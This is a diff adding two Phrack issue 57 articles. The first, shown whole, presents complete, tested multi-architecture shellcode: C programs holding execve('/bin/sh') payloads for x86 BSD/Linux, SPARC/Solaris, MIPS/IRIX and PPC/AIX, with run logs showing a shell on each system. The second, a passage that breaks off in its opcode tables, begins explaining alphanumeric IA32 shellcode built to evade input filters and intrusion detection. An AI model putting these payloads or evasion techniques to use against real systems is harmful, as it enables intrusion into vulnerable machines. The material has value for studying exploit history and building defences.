+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x39, Phile #0x0e of 0x12
+
+|=---------------=[ Architecture Spanning Shellcode ]=-------------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------=[ eugene@gravitino.net ]=-------------------------=|
+
+
+
+Introduction
+------------
+
+  At defcon8 caezar's challenge 4 party [1] a problem was present to write
+a shellcode that would run on two or more processor platforms. Below you
+will find my solution (don't forget to check the credits section).
+
+  The general idea behind an architecture spanning shellcode is trying
+to come up with a sequence of bytes that would execute a jump instruction
+on one architecture while executing a nop-like instruction on another
+architecture. That way we can branch to architecture specific code
+depending on the platform our code is running on.
+
+  Here is an ASCII representation of our byte stream:
+
+XXX
+arch1 shellcode
+arch2 shellcode
+
+where XXX is a sequence of bytes that is going to branch to arch2's
+shellcode on architecture 2 and is going to fall through to arch1
+shellcode on architecture 1.
+
+  If we want to add more platforms we would need to add additional
+jump/nop instructions for each additional platform.
+
+
+
+MIPS architecture
+------------------
+
+  A brief introduction to the MIPS architecture and writing MIPS shellcode
+was described by scut in phrack 56 [2] as well as by the LSD folks in their
+paper [8].
+
+  The only thing that is worse repeating here is the general MIPS
+instruction format. All MIPS instructions occupy 32 bits and the sixth most
+significant bits specify the instruction opcode [6][7]. There are 3
+instruction formats: I-Type (immediate), J-Type (Jump) and
+R-Type (Register). Since we are looking for a nop-like instructions we are
+mostly interesting in I and R type instructions whose format is listed
+below.
+
+
+I-Type instruction format:
+
+31 30 29 28 27 26|25 24 23 22 21| 20 19 18 17 16| 15 .. 0
+        op       |       rs     |        rt     | immediate
+
+fields are:
+	op		6-bit operation code
+	rs		5-bit source register specifier
+	rt		5-bit target (src/dest) or branch condition
+	immediate	16-bit immediate, branch or address displacement
+
+
+
+R-Type instruction format:
+
+31 30 29 28 27 26|25 24 23 22 21| 20 19 18 17 16| 15 14 131211|109876|5..0
+        op       |       rs     |        rt     |      rd     | shamt|funct
+
+fields are:
+	op		6-bit operation code
+	rs		5-bit source register specifier
+	rt		5-bit target (src/dest) or branch condition
+	rd		5-bit destination register specifier
+	shamt		5-bit shift amount
+	funct		6-bit function field
+
+
+
+Sparc architecture
+------------------
+
+  Similarly to MIPS, Sparc is a RISC based architecture. All the Sparc
+instructions occupy 32 bits and the two most significant bits specify an
+instruction class [4]:
+
+
+op	Instruction Class
+
+00	Branch instructions
+01	call instruction
+10	Format Three instructions (type 1)
+11	Format Three instructions (type 2)
+
+
+  Format one call instruction contains an op field '01' followed by 30 bits
+of address. Even though this is the optimal instruction to use, since we
+control 30 bits out of 32, we won't be able to use it since the jumps are
+not relative and tend to have 0 bytes in them.
+
+  Format three instructions (type 2) are mostly load/store instructions
+which are mostly useless to us since we are only looking for relatively
+harmless nop-like instructions. We definitely don't want to use anything
+that has possibility of crashing our program (SIGSEGV in case of an illegal
+load/store).
+
+  This leaves us with branch and format three instructions (type 1) to use.
+Here is the format of a format three instruction:
+
+
+31 30 |29 28 27 26 25|24 23 22 21 20 19|18 17 16 15 14|13|12 11 10 9 8 7..0
+  op  |       rd     |      op3        |       rs1    |01|    rs2 / imm
+
+fields are:
+	op		2-bit instruction class (10)
+	rd		5-bit destination register specifier
+	op3		5-bit instruction specifier
+	rs1		5-bit source register
+	0/1		1-bit constant / second source register option
+	rs2 / imm	13-bit specifies either a second source register or
+                               a constant
+
+  Some of the promising looking (harmless) format three instructions are
+add, and, or, xor and sll/srl (specified by op3 bits).
+
+And here is the branch instruction format:
+
+31 30 |29|28 27 26 25|24 23 22|21 .. 0
+  op  |a | condition |   op2  |displacement
+
+fields are:
+	op		2-bit instruction class (00)
+	a		1-bit annulled flag
+	condition	5-bit condition specifier.. ba, bn, bl, ble, be, etc
+	op2		3-bit condition code (integer condition code is 010)
+	displacement	22-bit address displacement
+
+
+  As you can see, a lot of the fields already have predefined values which
+we need to work around.
+
+
+PPC architecture
+----------------
+
+  PowerPC is yet another RISC architecture used by vendors such as IBM and
+Apple. See LSD's paper [8] for more information.
+
+
+x86 architecture
+----------------
+
+  The topic of buffer overflows and shellcode on x86 architecture has been
+beaten to death before. For a good introduction see Aleph1's article in
+phrack 49 [3].
+
+  To expand just a little bit on the topic I am going to present x86 code
+that works on multiple x86 operating systems. The idea behind an
+"OS spanning" shellcode is to setup all the registers and stack in such a
+way as to satisfy the requirements of all the operating systems that our
+shellcode is meant to execute on. For example, BSD passes its parameters on
+stack while Linux uses registers (for passing arguments to syscalls). If we
+setup both registers and stack than our code would run on both BSD and
+Linux x86 systems. The only problem with writing shellcode for BSD & Linux
+systems is the different execve() syscall numbers the two systems use.
+Linux uses syscall number 0xb while BSD uses 0x3b. To overcome this
+problem, we need to distinguish between the two systems at runtime.
+There are plenty of ways to do that such as checking where various segments
+are mapped, the way segment registers are setup, etc. I chose to analyze
+the segment registers since that method seems to be pretty robust. On Linux
+systems, for example, segment registers fs and gs are set 0 (in user mode)
+while on BSD systems they are set to non zero values (0x1f on OpenBSD,
+0x2f on FreeBSD). We can exploit that difference to distinguish between the
+two different systems. See "Adding more architectures" section for a
+working example.
+
+  Another way to to handle different syscall numbers is to ignore an
+"invalid system call" SIGSYS signal and just try a different syscall number
+if the first execve() call failed. While that method certainly works it
+is quite limited and cannot be applied to other operating systems such as
+the x86 Solaris which doesn't use the 0x80 interrupt trap gate.
+
+  Note that the "OS Spanning" shellcode is certainly not restricted to an
+x86 platform, the same idea can be applied to any hardware platform and any
+operating system.
+
+
+
+Putting it all together.. Architecture spanning shellcode
+---------------------------------------------------------
+
+  As I have mentioned before our shellcode (first attempt) is going to look
+like
+
+XXX
+arch1 shellcode
+arch2 shellcode
+
+where XXX is a specially crafted string that executes different
+instructions on two different platforms.
+
+  When I initially started looking for a working XXX string, I took an x86
+short jump instruction and tried to decode it on a sun box. Since the
+first byte of an x86 short jump instruction is 0xEB (which is almost all
+1's) [5], the instruction decoded into a weird format 3 sparc instruction.
+My next attempt consisted of writing a sparc jump instruction and trying to
+decode it on an x86 platform. That idea almost worked but i was unable to
+decode the sparc jump instruction into a nop-like x86 xor instruction due
+to a one bit offset difference. The next attempt consisted of padding an
+x86 jump instruction. Since an x86 short jump instruction is 2 bytes long
+and all the sparc instructions are 4 bytes long, I had 2 bytes to play
+with. I knew that I had to insert some bytes before the jump 0xEB byte in
+order to be able to decode the instruction into something reasonable on
+sparc. For my pad bytes I chose to use the x86 0x90 nop bytes which turned
+out to be a good idea since 0x90 is mostly all 0's. My instruction stream
+than looked like
+
+\x90\x90\xeb\x30
+
+where 0x90 is the x86 nop instruction, 0xEB is the opcode for an x86 short
+jump and 0x30 is a 48 byte jump offset. Here is what the above string
+decoded to on a Sun machine:
+
+(gdb) x 0x1054c
+0x1054c <main+20>:      0x9090eb30
+
+(gdb) x/t 0x1054c
+0x1054c <main+20>:      10010000100100001110101100110000
+
+(gdb) x/i 0x1054c
+0x1054c <main+20>:      orcc  %g3, 0xb30, %o0
+
+  As you can see, our string decoded to a harmless format 3 'or'
+instruction that corrupted the %o0 register. This is exactly what we were
+looking for, a short jump on one architecture (x86) and a harmless
+instruction on another architecture (sparc). With that in mind our
+shellcode now looks like this:
+
+\x90\x90\xeb\x30
+[sparc shellcode]
+[x86 shellcode]
+
+
+Let's try it out..
+
+
+[openbsd]$ cat ass.c		; ass as in Architecture Spanning Shellcode :)
+char sc[] =
+	/* magic string */
+	"\x90\x90\xeb\x30"
+
+	/* sparc solaris execve() */
+	"\x2d\x0b\xd8\x9a"                   /* sethi $0xbd89a, %l6        */
+	"\xac\x15\xa1\x6e"                   /* or %l6, 0x16e, %l6         */
+	"\x2f\x0b\xdc\xda"                   /* sethi $0xbdcda, %l7        */
+	"\x90\x0b\x80\x0e"                   /* and %sp, %sp, %o0          */
+	"\x92\x03\xa0\x08"                   /* add %sp, 8, %o1            */
+	"\x94\x1a\x80\x0a"                   /* xor %o2, %o2, %o2          */
+	"\x9c\x03\xa0\x10"                   /* add %sp, 0x10, %sp         */
+	"\xec\x3b\xbf\xf0"                   /* std %l6, [%sp - 0x10]      */
+	"\xdc\x23\xbf\xf8"                   /* st %sp, [%sp - 0x08]       */
+	"\xc0\x23\xbf\xfc"                   /* st %g0, [%sp - 0x04]       */
+	"\x82\x10\x20\x3b"                   /* mov $0x3b, %g1             */
+	"\x91\xd0\x20\x08"                   /* ta 8                       */
+
+	/* BSD execve() */
+        "\xeb\x17"                      /* jmp */
+        "\x5e"                          /* pop  %esi */
+        "\x31\xc0"                      /* xor  %eax, %eax */
+        "\x50"                          /* push %eax */
+        "\x88\x46\x07"                  /* mov  %al,0x7(%esi) */
+        "\x89\x46\x0c"                  /* mov  %eax,0xc(%esi) */
+        "\x89\x76\x08"                  /* mov  %esi,0x8(%esi) */
+        "\x8d\x5e\x08"                  /* lea  0x8(%esi),%ebx */
+        "\x53"                          /* push %ebx */
+        "\x56"                          /* push %esi */
+        "\x50"                          /* push %eax */
+        "\xb0\x3b"                      /* mov  $0x3b, %al */
+        "\xcd\x80"                      /* int  $0x80 */
+        "\xe8\xe4\xff\xff\xff"          /* call */
+        "\x2f\x62\x69\x6e\x2f\x73\x68"; /* /bin/sh */
+
+
+int main(void)
+{
+        void (*f)(void) = (void (*)(void)) sc;
+
+        f();
+
+        return 0;
+}
+
+
+[openbsd]$ gcc ass.c
+[openbsd]$ ./a.out
+$ uname -ms
+OpenBSD i386
+
+[solaris]$ gcc ass.c
+[solaris]$ ./a.out
+$ uname -ms
+SunOS sun4u
+
+it worked!
+
+
+
+Adding more architectures
+-------------------------
+
+  Theoretically, spanning shellcode is not tied to any specific operating
+system nor any specific hardware architecture. Thus it should be possible
+to write shellcode that runs on more than two architectures. The format
+for our shellcode (second attempt) that runs on 3 architectures is going
+to be
+
+XXX
+YYY
+arch1 shellcode
+arch2 shellcode
+arch3 shellcode
+
+where arch1 is MIPS, arch2 is Sparc and arch3 is x86.
+
+  My first attempt was to try and reuse the magic string from ass.c.
+Unfortunately, 0x9090eb30 didn't decode into anything reasonable on an IRIX
+platform and so I was forced to look elsewhere. My next attempt was to
+replace 0x90 bytes with some other nop-like bytes looking for a sequence
+that would work on both Sparc & MIPS platforms. After a trying out a bunch
+of x86 nop instructions from K2's ADMmutate toolkit, I stumbled upon an AAA
+instruction whose opcode was 0x37. The AAA instruction worked out great
+since the 0x3737eb30 string decoded correctly on all three platforms:
+
+x86:
+	aaa
+	aaa
+	jmp +120
+
+sparc:
+	sethi  %hi(0xdFADE000), %i3
+
+mips:
+	ori $s7,$t9,0xeb78
+
+
+with XXX string out of the way, I was left with MIPS and Sparc platforms
+YYY part. The very first instruction I tried worked on both platforms.
+The instruction was a Sparc annulled short jump ba,a (0x30800012) which
+decoded to
+
+andi $zero,$a0,0x12
+
+on a MIPS platform. Not only did the jump instruction decoded to a harmless
+'andi' on a MIPS platform, it also didn't require a branch delay slot
+instruction after it since the ba jump was annulled [4].
+So now our shellcode looks like this
+
+
+        "\x37\x37\xeb\x78"      /* x86:         aaa; aaa; jmp 116+4     */
+                                /* MIPS:        ori $s7,$t9,0xeb78      */
+                                /* Sparc:       sethi %hi(0xdfade000),%i3*/
+
+        "\x30\x80\x00\x12"      /* MIPS:        andi $zero,$a0,0x12     */
+                                /* Sparc:       ba,a +72                */
+
+	[snip real shellcode]
+
+
+  While we are adding more architectures to our shellcode let's also take
+a look at PPC/AIX. The first logical thing to do is to try and decode
+the existing XXX and YYY strings from the above shellcode on the PPC
+platform:
+
+(gdb) x 0x10000364
+0x10000364 <main+36>:   0x3737eb78
+
+(gdb) x/i 0x10000364
+0x10000364 <main+36>:   addic.  r25,r23,-5256
+
+(gdb) x/x 0x10000368
+0x10000368 <main+40>:   0x30800012
+
+(gdb) x/i 0x10000368
+0x10000368 <main+40>:   addic   r4,r0,18
+
+is this our lucky day or what? the XXX and YYY strings from the above
+MIPS/x86/Sparc combo have correctly decoded to two harmless add
+instructions. All we need to do now is to come up with another instruction
+that is going to execute a jump on a MIPS platform while executing a nop on
+PPC/AIX. After a bit of searching MIPS 'bgtz' instruction turned out to
+decode into a valid multiply instruction on AIX:
+
+
+[MIPS]
+(gdb) x 0x10001008
+0x10001008 <sc+8>:      0x1ee00101
+
+(gdb) x/i 0x10001008
+0x10001008 <sc+8>:      bgtz $s7,0x10001410 <+1040>
+
+
+[AIX]
+(gdb) x 0x10000378
+0x10000378 <main+56>:   0x1ee00101
+
+(gdb) x/i 0x10000378
+0x10000378 <main+56>:   mulli   r23,r0,257
+
+the bgtz instruction is a branch on greater than zero [7]. Notice that the
+branch instruction uses the $s7 register which was modified by us in a
+previous nop instruction. The branch displacement is set to 0x0101 (to
+avoid NULL bytes in the instruction) which is equivalent to a relative
+1028 byte forward jump. Let's put everything together now..
+
+
+
+[openbsd]$ cat ass.c
+
+/*
+ * Architecture/OS Spanning Shellcode
+ *
+ * runs on x86 (freebsd, netbsd, openbsd, linux), MIPS/Irix, Sparc/Solaris
+ * and PPC/AIX (AIX platforms require -DAIX compiler flag)
+ *
+ * eugene@gravitino.net
+ */
+
+char sc[] =
+	/* voodoo */
+	"\x37\x37\xeb\x7b"	/* x86:		aaa; aaa; jmp 116+4	*/
+				/* MIPS:	ori	$s7,$t9,0xeb7b	*/
+				/* Sparc:	sethi	%hi(0xdFADEc00), %i3 */
+				/* PPC/AIX:	addic.	r25,r23,-5253	*/
+
+	"\x30\x80\x01\x14"	/* MIPS:	andi	$zero,$a0,0x114	*/
+				/* Sparc: 	ba,a	+1104		*/
+				/* PPC/AIX:	addic   r4,r0,276	*/
+
+	"\x1e\xe0\x01\x01"	/* MIPS:	bgtz	$s7, +1032	*/
+				/* PPC/AIX:	mulli	r23,r0,257	*/
+
+	"\x30\x80\x01\x14"	/* fill in the MIPS branch delay slot
+				   with the above MIPS / AIX nop	*/
+
+
+	/* PPC/AIX shellcode by LAST STAGE OF DELIRIUM	*://lsd-pl.net/	*/
+	"\x7e\x94\xa2\x79"	/* xor.		r20,r20,r20		*/
+	"\x40\x82\xff\xfd"	/* bnel		<syscallcode>		*/
+	"\x7e\xa8\x02\xa6"	/* mflr		r21			*/
+	"\x3a\xc0\x01\xff"	/* lil		r22,0x1ff		*/
+	"\x3a\xf6\xfe\x2d"	/* cal		r23,-467(r22)		*/
+	"\x7e\xb5\xba\x14"	/* cax		r21,r21,r23		*/
+	"\x7e\xa9\x03\xa6"	/* mtctr	r21			*/
+	"\x4e\x80\x04\x20"	/* bctr					*/
+
+	"\x04\x82\x53\x71"
+	"\x87\xa0\x89\xfc"
+	"\x69\x68\x67\x65"
+
+	"\x4c\xc6\x33\x42"	/* crorc	cr6,cr6,cr6		*/
+	"\x44\xff\xff\x02"	/* svca		0x0			*/
+	"\x3a\xb5\xff\xf8"	/* cal		r21,-8(r21)		*/
+
+	"\x7c\xa5\x2a\x79"	/* xor.		r5,r5,r5		*/
+	"\x40\x82\xff\xfd"	/* bnel		<shellcode>		*/
+	"\x7f\xe8\x02\xa6"	/* mflr		r31			*/
+	"\x3b\xff\x01\x20"	/* cal		r31,0x120(r31)		*/
+	"\x38\x7f\xff\x08"	/* cal		r3,-248(r31)		*/
+	"\x38\x9f\xff\x10"	/* cal		r4,-240(r31)		*/
+	"\x90\x7f\xff\x10"	/* st		r3,-240(r31)		*/
+	"\x90\xbf\xff\x14"	/* st		r5,-236(r31)		*/
+	"\x88\x55\xff\xf4"	/* lbz		r2,-12(r21)		*/
+	"\x98\xbf\xff\x0f"	/* stb		r5,-241(r31)		*/
+	"\x7e\xa9\x03\xa6"	/* mtctr	r21			*/
+	"\x4e\x80\x04\x20"	/* bctr					*/
+	"/bin/sh"
+
+
+	/* x86 BSD/Linux execve() by me */
+        "\xeb\x29"		/* jmp					*/
+        "\x5e"			/* pop		%esi			*/
+        "\x31\xc0"		/* xor		%eax, %eax		*/
+        "\x50"			/* push		%eax 			*/
+        "\x88\x46\x07"		/* mov		%al,0x7(%esi) 		*/
+        "\x89\x46\x0c"		/* mov		%eax,0xc(%esi)		*/
+        "\x89\x76\x08"		/* mov		%esi,0x8(%esi)		*/
+        "\x8d\x5e\x08"		/* lea		0x8(%esi),%ebx		*/
+        "\x53"			/* push		%ebx			*/
+        "\x56"			/* push		%esi			*/
+        "\x50"			/* push		%eax			*/
+
+        /* setup registers for linux */
+        "\x8d\x4e\x08"		/* lea		0x8(%esi),%ecx		*/
+        "\x8d\x56\x08"		/* lea		0x8(%esi),%edx		*/
+        "\x89\xf3"		/* mov		%esi, %ebx		*/
+
+        /* distinguish between BSD & Linux */
+        "\x8c\xe0"		/* movl		%fs, %eax		*/
+        "\x21\xc0"		/* andl		%eax, %eax		*/
+        "\x74\x04"		/* jz		+4			*/
+        "\xb0\x3b"		/* mov		$0x3b, %al		*/
+        "\xeb\x02"		/* jmp		+2			*/
+        "\xb0\x0b"		/* mov		$0xb, %al		*/
+
+        "\xcd\x80"		/* int		$0x80			*/
+
+        "\xe8\xd2\xff\xff\xff"	/* call					*/
+        "\x2f\x62\x69\x6e"	/* /bin					*/
+	"\x2f\x73\x68"		/* /sh					*/
+
+
+	/*
+	 * pad the MIPS/Irix & Sparc/Solaris shellcodes
+	 * jumps of > 0x0101 bytes are performed on both platforms
+	 * to avoid NULL bytes in the jump instructions
+	 */
+	"2359595912811011811145128130124118116118121114127231291301241171"
+	"2911813245571341291181211101231241181291101234512913012411712911"
+	"8132455712712412112411245123118120128451291301241171291181324512"
+	"9128118133114451141004559113130110111451141171294511512445134129"
+	"1301101141112311411712945571171121291181321284511411712945113123"
+	"1104512312412712911211412111445114117129451151244511312112712413"
+	"2451141171294559595913212412345113121127124132451271301244512811"
+	"8451281181179797117118128451181284512413012745132124127121113451"
+	"2312413259595945129117114451321241271211134512411545129117114451"
+	"1412111411212912712412345110123113451291171144512813211812911211"
+	"7574512911711423111114110130129134451241154512911711445111110130"
+	"1135945100114451141331181281294513211812911712413012945128120118"
+	"1234511212412112412757451321181291171241301294512311012911812412"
+	"31101211181291345745132118"
+
+
+        /* 68 byte MIPS/Irix PIC execve shellcode. -scut/teso		*/
+        "\xaf\xa0\xff\xfc"      /* sw           $zero, -4($sp)          */
+        "\x24\x06\x73\x50"      /* li           $a2, 0x7350             */
+        "\x04\xd0\xff\xff"      /* bltzal       $a2, dpatch             */
+        "\x8f\xa6\xff\xfc"      /* lw           $a2, -4($sp)            */
+
+        /* a2 = (char **) envp = NULL */
+        "\x24\x0f\xff\xcb"      /* li           $t7, -53                */
+        "\x01\xe0\x78\x27"      /* nor          $t7, $t7, $zero         */
+        "\x03\xef\xf8\x21"      /* addu         $ra, $ra, $t7           */
+
+        /* a0 = (char *) pathname */
+        "\x23\xe4\xff\xf8"      /* addi         $a0, $ra, -8            */
+
+        /* fix 0x42 dummy byte in pathname to shell */
+        "\x8f\xed\xff\xfc"      /* lw           $t5, -4($ra)            */
+        "\x25\xad\xff\xbe"      /* addiu        $t5, $t5, -66           */
+        "\xaf\xed\xff\xfc"      /* sw           $t5, -4($ra)            */
+
+        /* a1 = (char **) argv */
+        "\xaf\xa4\xff\xf8"      /* sw           $a0, -8($sp)            */
+        "\x27\xa5\xff\xf8"      /* addiu        $a1, $sp, -8            */
+
+        "\x24\x02\x04\x23"      /* li           $v0, 1059 (SYS_execve)  */
+        "\x01\x01\x01\x0c"      /* syscall                              */
+        "\x2f\x62\x69\x6e"      /* .ascii       "/bin"                  */
+        "\x2f\x73\x68\x42"      /* .ascii       "/sh", .byte 0xdummy    */
+
+
+        /* Sparc Solaris execve() by an unknown author */
+        "\x2d\x0b\xd8\x9a"	/* sethi	$0xbd89a, %l6           */
+        "\xac\x15\xa1\x6e"	/* or		%l6, 0x16e, %l6         */
+        "\x2f\x0b\xdc\xda"	/* sethi	$0xbdcda, %l7           */
+        "\x90\x0b\x80\x0e"	/* and		%sp, %sp, %o0           */
+        "\x92\x03\xa0\x08"	/* add		%sp, 8, %o1             */
+        "\x94\x1a\x80\x0a"	/* xor		%o2, %o2, %o2           */
+        "\x9c\x03\xa0\x10"	/* add		%sp, 0x10, %sp          */
+        "\xec\x3b\xbf\xf0"	/* std		%l6, [%sp - 0x10]       */
+        "\xdc\x23\xbf\xf8"	/* st		%sp, [%sp - 0x08]       */
+        "\xc0\x23\xbf\xfc"	/* st		%g0, [%sp - 0x04]       */
+        "\x82\x10\x20\x3b"	/* mov		$0x3b, %g1              */
+        "\x91\xd0\x20\x08"	/* ta		8                       */
+;
+
+
+int main(void)
+{
+#if defined(AIX)
+	/* copyright LAST STAGE OF DELIRIUM feb 2001 poland */
+        int jump[2]={(int)sc,*((int*)&main+1)};
+
+        ((*(void (*)())jump)());
+#else
+        void (*f)(void) = (void (*)(void)) sc;
+
+        f();
+#endif
+
+        return 0;
+}
+
+
+[openbsd]$ gcc ass.c
+[openbsd]$ ./a.out
+$ uname -ms
+OpenBSD i386
+
+[freebsd]$ gcc ass.c
+[freebsd]$ ./a.out
+$ uname -ms
+FreeBSD i386
+
+[linux]$ gcc ass.c
+[linux]$ ./a.out
+$ uname -ms
+Linux i686
+
+[solaris]$ gcc ass.c
+[solaris]$ ./a.out
+$ uname -ms
+SunOS sun4u
+
+[irix]$ gcc ass.c
+[irix]$ ./a.out
+$ uname -ms
+IRIX IP22
+
+[aix]$ gcc ass.c
+[aix]$ ./a.out
+$ uname -ms
+AIX 000089101000
+
+
+
+Conclusion
+-----------
+
+  Architecture spanning shellcode is a specially crafted code that executes
+differently depending on the architecture it is being run on. The code
+achieves that by using a series of bytes which execute differently on
+different architectures.
+
+  OS spanning shellcode is specially crafted code that executes on
+multiple operating systems all running on the same platform. The code
+achieves that by setting up the registers and the stack in a way that
+satisfies the operating systems that the code is being run on.
+
+
+
+Credits / Thanks
+----------------
+
+Greg Hoglund	working with me on this idea at the challenge party
+
+prole and harm	for coming with an idea way before the challenge
+		http://www.redgeek.net/~prole/ASSC.txt
+
+gravitino.net, GHI, skyper, spoonm
+
+
+
+References
+----------
+
+[1] Caezar's challenge
+    http://www.caezarschallenge.org
+
+[2] Writing MIPS/IRIX shellcode
+    scut (phrack 56)
+
+[3] Smashing The Stack For Fun And Profit
+    Aleph One (phrack 49)
+
+[4] SPARC Architecture, Assembly Language Programming, and C. 2nd ed.
+    Richard P. Paul
+
+[5] IA-32 Intel Architecture, Software Developer's Manual
+    Intel, Corp
+    http://developer.intel.com
+
+[6] Computer Organization and Design
+    David A. Patterson and John L. Hennessy
+
+[7] MIPS RISC Architecture
+    Gerry Kane and Joe Heinrich
+
+[8] UNIX Assembly Codes Development for Vulnerabilities Illustration
+    Purposes
+    The Last Stage of Delirium Research Group http://lsd-pl.net
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack57/15.txt b/phrack57/15.txt
new file mode 100644
index 0000000..212581a
--- /dev/null
+++ b/phrack57/15.txt
@@ -0,0 +1,2478 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x39, Phile #0x0f of 0x12
+
+|=--------------=[ Writing ia32 alphanumeric shellcodes ]=---------------=|
+|=-----------------------------------------------------------------------=|
+|=--------------------------=[ rix@hert.org ]=---------------------------=|
+
+
+
+----| Introduction
+
+
+Today, more and more exploits need to be written using assembler,
+particularly to write classical shellcodes (for buffer overflows, or
+format string attacks,...).
+
+Many programs now achieve powerfull input filtering, using functions like
+strspn() or strcspn(): it prevents people from easily inserting shellcodes
+in different buffers.
+In the same way, we observe more and more IDS detecting suspicious
+opcodes sequences, some of them indicating the presence of a shellcode.
+
+One way to evade such pattern matching techniques is to use polymorphic
+stuff, like using tools such as K2's ADMmutate.
+Another way to do this is going to be presented here: we'll try to write
+IA32 non filterable shellcodes, using only alphanumeric chars: more
+precisely, we'll use only chars like '0'->'9','A'->'Z' and 'a'->'z'.
+
+If we can write such alphanumeric shellcodes, we will be able to store our
+shellcodes nearly everywhere! Let's enumerate some interesting
+possibilities:
+- filtered inputs
+- environment variables
+- classical commands, instructions & parameters from usual protocols
+- filenames & directories
+- usernames & passwords
+- ...
+
+
+
+----| The usable instructions
+
+
+Before beginning to think about particular techniques, let's first have a
+look at the IA32 instructions that will be interesting for us.
+
+First of all, some conventions (from Intel references) that we'll use in
+our summary arrays:
+ <r8>          : indicates a byte register.
+ <r32>         : indicates a doubleword register.
+ <r/m8>        : indicates a byte register or a byte from memory (through
+                 a pointer).
+ <r/m32>       : indicates a doubleword register or a doubleword from
+                 memory (through a pointer).
+ </r>          : indicates that the instruction byte is followed of
+                 possibly several operand bytes. One of those bytes, the
+                 "ModR/M byte", permits us to specify the used addressing
+                 form,with the help of 3 bit fields.
+
+                     ModR/M byte:                 
+                     
+                    7 6 5 4 3 2 1 0 
+                   +---+-----+-----+
+                   |mod|  r  | r/m |
+                   +---+-----+-----+
+                   
+                 In this case, the </r> indicates us the ModR/M byte will
+                 contain a register operand and a register or memory
+                 operand.
+ <imm8>        : indicates an immediate byte value.
+ <imm32>       : indicates an immediate doubleword value.
+ <disp8>       : indicates a signed 8 bits displacement.
+ <disp32>      : indicates a signed 32 bits displacement.
+ <...>         : indicates the instruction possibly need some operands
+                 (eventually encoded on several operand bytes).
+
+
+ALPHANUMERIC OPCODES:
+
+Now, let's remember all instructions with alphanumeric opcodes:
+
+hexadecimal opcode | char | instruction                    | interesting
+-------------------+------+--------------------------------+------------
+30 </r>            | '0'  | xor <r/m8>,<r8>                | YES
+31 </r>            | '1'  | xor <r/m32>,<r32>              | YES
+32 </r>            | '2'  | xor <r8>,<r/m8>                | YES
+33 </r>            | '3'  | xor <r32>,<r/m32>              | YES
+34 <imm8>          | '4'  | xor al,<imm8>                  | YES
+35 <imm32>         | '5'  | xor eax,<imm32>                | YES
+36                 | '6'  | ss:   (Segment Override Prefix)|
+37                 | '7'  | aaa                            |
+38 </r>            | '8'  | cmp <r/m8>,<r8>                | YES
+39 </r>            | '9'  | cmp <r/m32>,<r32>              | YES
+                   |      |                                |
+41                 | 'A'  | inc ecx                        | YES
+42                 | 'B'  | inc edx                        | YES
+43                 | 'C'  | inc ebx                        | YES
+44                 | 'D'  | inc esp                        | YES
+45                 | 'E'  | inc ebp                        | YES
+46                 | 'F'  | inc esi                        | YES
+47                 | 'G'  | inc edi                        | YES
+48                 | 'H'  | dec eax                        | YES
+49                 | 'I'  | dec ecx                        | YES
+4A                 | 'J'  | dec edx                        | YES
+4B                 | 'K'  | dec ebx                        | YES
+4C                 | 'L'  | dec esp                        | YES
+4D                 | 'M'  | dec ebp                        | YES
+4E                 | 'N'  | dec esi                        | YES
+4F                 | 'O'  | dec edi                        | YES
+50                 | 'P'  | push eax                       | YES
+51                 | 'Q'  | push ecx                       | YES
+52                 | 'R'  | push edx                       | YES
+53                 | 'S'  | push ebx                       | YES
+54                 | 'T'  | push esp                       | YES
+55                 | 'U'  | push ebp                       | YES
+56                 | 'V'  | push esi                       | YES
+57                 | 'W'  | push edi                       | YES
+58                 | 'X'  | pop eax                        | YES
+59                 | 'Y'  | pop ecx                        | YES
+5A                 | 'Z'  | pop edx                        | YES
+                   |      |                                |
+61                 | 'a'  | popa                           | YES
+62 <...>           | 'b'  | bound <...>                    |
+63 <...>           | 'c'  | arpl <...>                     |
+64                 | 'd'  | fs:   (Segment Override Prefix)|
+65                 | 'e'  | gs:   (Segment Override Prefix)|
+66                 | 'f'  | o16:    (Operand Size Override)| YES
+67                 | 'g'  | a16:    (Address Size Override)|
+68 <imm32>         | 'h'  | push <imm32>                   | YES
+69 <...>           | 'i'  | imul <...>                     | 
+6A <imm8>          | 'j'  | push <imm8>                    | YES
+6B <...>           | 'k'  | imul <...>                     |
+6C <...>           | 'l'  | insb <...>                     |
+6D <...>           | 'm'  | insd <...>                     |
+6E <...>           | 'n'  | outsb <...>                    |
+6F <...>           | 'o'  | outsd <...>                    |
+70 <disp8>         | 'p'  | jo <disp8>                     | YES
+71 <disp8>         | 'q'  | jno <disp8>                    | YES
+72 <disp8>         | 'r'  | jb <disp8>                     | YES
+73 <disp8>         | 's'  | jae <disp8>                    | YES
+74 <disp8>         | 't'  | je <disp8>                     | YES
+75 <disp8>         | 'u'  | jne <disp8>                    | YES
+76 <disp8>         | 'v'  | jbe <disp8>                    | YES
+77 <disp8>         | 'w'  | ja <disp8>                     | YES
+78 <disp8>         | 'x'  | js <disp8>                     | YES
+79 <disp8>         | 'y'  | jns <disp8>                    | YES
+7A <disp8>         | 'z'  | jp <disp8>                     | YES
+
+What can we directly deduct of all this?
+
+- NO "MOV" INSTRUCTIONS:
+ => we need to find another way to manipulate our data.
+- NO INTERESTING ARITHMETIC INSTRUCTIONS ("ADD","SUB",...):
+ => we can only use DEC and INC.
+ => we can't use INC with the EAX register.
+- THE "XOR" INSTRUCTION:
+ => we can use XOR with bytes and doublewords.
+ => very interesting for basic crypto stuff. 
+- "PUSH"/"POP"/"POPAD" INSTRUCTIONS:
+ => we can push bytes and doublewords directly on the stack.
+ => we can only use POP with the EAX,ECX and EDX registers.
+ => it seems we're going to play again with the stack.
+- THE "O16" OPERAND SIZE OVERRIDE:
+ => we can also achieve 16 bits manipulations with this instruction
+    prefix.
+- "JMP" AND "CMP" INSTRUCTIONS:
+ => we can realize some comparisons.
+ => we can't directly use constant values with CMP.
+
+
+Besides, Don't forget that operands of these instructions (</r>, <imm8>,
+<imm32>, <disp8> and <disp32>) must also remain alphanumeric. It may
+make our task once again more complicated...
+
+
+THE "ModR/M" BYTE:
+
+For example, let's observe the effect of this supplementary constraint on
+the ModR/M byte (</r>), particularly for XOR and CMP.
+In the next array, we'll find all the possible values for this ModR/M
+byte, and their interpretation as <r8>/<r32> (first row) and <r/m> (first
+column) operands.
+
+           <r8>:|  al  |  cl  |  dl  |  bl  |  ah  |  ch  |  dh  |  bh 
+          <r32>:| eax  | ecx  | edx  | ebx  | esp  | ebp  | esi  | edi
